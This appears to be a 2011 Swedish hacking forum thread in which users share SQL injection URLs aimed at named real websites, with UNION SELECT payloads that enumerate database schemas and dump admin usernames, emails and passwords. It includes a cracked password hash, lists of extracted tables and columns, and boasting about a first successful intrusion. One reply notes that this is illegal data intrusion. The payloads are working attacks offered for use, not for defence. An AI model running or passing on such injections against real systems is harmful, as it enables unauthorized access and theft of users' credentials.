2011-03-14, 08:59
#2365
2011-03-14, 14:17
#2366
....
http://www.hightechhomemag.com
http://www.hightechhomemag.com/admin
inte testade...
http://www.hightechhomemag.com
Kod:
http://www.hightechhomemag.com/news/news.php?id=-25%20union%20all%20select%201,2,3,group_concat(username,0x3a,email,0x3a,password),5,6,7 %20from%20eggblog_members--
er56http://www.hightechhomemag.com/admin
inte testade...
Kod:
http://www.clanjaguar.com/news.php?show=news&id=-2' http://regesta.pl/news.php?id=' http://www.oakvilledowntown.com/whatsup/downtown-news.php?id=-25' http://www.entaonline.co.uk/news.php?id=' http://www.prestigetechnologies.com/news.php?id=25' http://felder.com/News.php?expand=yes&ID='
__________________
Senast redigerad av vicious 2011-03-14 kl. 14:55. Anledning: länk
Senast redigerad av vicious 2011-03-14 kl. 14:55. Anledning: länk
2011-03-14, 22:14
#2369
....det verkar så logiskt, men får fan inte till d 
http://www.protectyoursoftware.com
http://www.protectyoursoftware.com/adminarea/login.php
http://www.tup.edu.ph
webadmin:*93610C813461FD1597B69AF2EA12E8AE1F4A47B5 = julius
hittar dock ingen admin panel..
http://www.protectyoursoftware.com
Kod:
http://www.protectyoursoftware.com/news.php?id=-5%20union%20all%20select%201,2,group_concat(table_name),4%20from%20information_schema.t ables-- http://www.protectyoursoftware.com/news.php?id=-5%20union%20all%20select%201,2,group_concat(column_name),4%20from%20information_schema. columns%20where%20table_schema=database()--
http://www.protectyoursoftware.com/adminarea/login.php
http://www.tup.edu.ph
Kod:
http://www.tup.edu.ph/news.php?id=33%20union%20all%20select%201,2,table_name,4,5,6,7,8,9,10,11%20from%20information_schema .tables-- http://www.tup.edu.ph/news.php?id=33%20union%20all%20select%201,2,column_name,4,5,6,7,8,9,10,11%20from%20information_schem a.columns-- http://www.tup.edu.ph/news.php?id=33%20union%20all%20select%201,2,group_concat(username,0x3a,Password),4,5,6,7,8,9,10,11%2 0from%20users--
webadmin:*93610C813461FD1597B69AF2EA12E8AE1F4A47B5 = julius
hittar dock ingen admin panel..
__________________
Senast redigerad av vicious 2011-03-14 kl. 23:03. Anledning: länkar
Senast redigerad av vicious 2011-03-14 kl. 23:03. Anledning: länkar
2011-03-15, 18:30
#2371
Kod:
" http://www.protectyoursoftware.com/news.php?id=4+ORDER+BY+5 " //Kolumner
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,version(),4 "//Version
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(schema_name),4+FROM+information_schema.schemata " //Databaser
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(table_name),4+FROM+information_schema.tables+where+ table_schema=database()-- " //Tabeller från rätt databas
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(column_name),4+FROM+information_schema.columns+wher e+table_schema=database()-- " //Kolumnera
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(id,0x3a,email,0x3a,password),4+FROM+admin " //Hämta datan!!
#Tabeller
ADMIN,NEWS,ONLINEDEMO,WHITEPAPERS
#Kolumner
ID,EMAIL,PASSWORD,ID,DATE,HEADLINE,CONTENT,ID,CLIENTID,ACTIVATIONCODE,EMAILADDRESS,DATETIME,ID,TITLE ,PDFLINK
MIN FÖRSTA SQL INJECTION!!!
Tack fooztr!
EDIT:
Föresten är det jag har gjort olagligt?
Vet att det finns något som heter dataintrång, men det är väll först om jag testar lösenorden?
EDIT2:
lol, klartext lösenord
__________________
Senast redigerad av random7 2011-03-15 kl. 18:33.
Senast redigerad av random7 2011-03-15 kl. 18:33.
2011-03-15, 18:40
#2372
Citat:
MIN FÖRSTA SQL INJECTION!!!
Tack fooztr!
EDIT:
Föresten är det jag har gjort olagligt?
Vet att det finns något som heter dataintrång, men det är väll först om jag testar lösenorden?
EDIT2:
lol, klartext lösenord
Ursprungligen postat av random7
Kod:
" http://www.protectyoursoftware.com/news.php?id=4+ORDER+BY+5 " //Kolumner
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,version(),4 "//Version
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(schema_name),4+FROM+information_schema.schemata " //Databaser
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(table_name),4+FROM+information_schema.tables+where+ table_schema=database()-- " //Tabeller från rätt databas
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(column_name),4+FROM+information_schema.columns+wher e+table_schema=database()-- " //Kolumnera
" http://www.protectyoursoftware.com/news.php?id=-4+UNION+ALL+SELECT+1,2,group_concat(id,0x3a,email,0x3a,password),4+FROM+admin " //Hämta datan!!
#Tabeller
ADMIN,NEWS,ONLINEDEMO,WHITEPAPERS
#Kolumner
ID,EMAIL,PASSWORD,ID,DATE,HEADLINE,CONTENT,ID,CLIENTID,ACTIVATIONCODE,EMAILADDRESS,DATETIME,ID,TITLE ,PDFLINK
MIN FÖRSTA SQL INJECTION!!!
Tack fooztr!
EDIT:
Föresten är det jag har gjort olagligt?
Vet att det finns något som heter dataintrång, men det är väll först om jag testar lösenorden?
EDIT2:
lol, klartext lösenord
Nej, du har just begått ett dataintrång vilket är en olaglig handling.
2011-03-15, 18:51
#2373
Citat:
Ursprungligen postat av Qweasd123
Nej, du har just begått ett dataintrång vilket är en olaglig handling.
2011-03-15, 18:59
#2374
...
http://www.cstadlandskap.se
såg hackerman hann före
http://www.cstadlandskap.se
Kod:
http://www.cstadlandskap.se/news.php?id=-7%20union%20all%20select%201,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,1 2%20from%20users--
såg hackerman hann före
__________________
Senast redigerad av vicious 2011-03-15 kl. 19:56. Anledning: ...
Senast redigerad av vicious 2011-03-15 kl. 19:56. Anledning: ...
2011-03-16, 01:47
#2375
Citat:
Ursprungligen postat av random7
Hoppas du hade proxy
Så sött att se nya blommor blomma.
Tror sig vara en i bucketten redan första dagen
2011-03-16, 06:12
#2376
Skapa ett konto eller logga in för att kommentera
Du måste vara medlem för att kunna kommentera
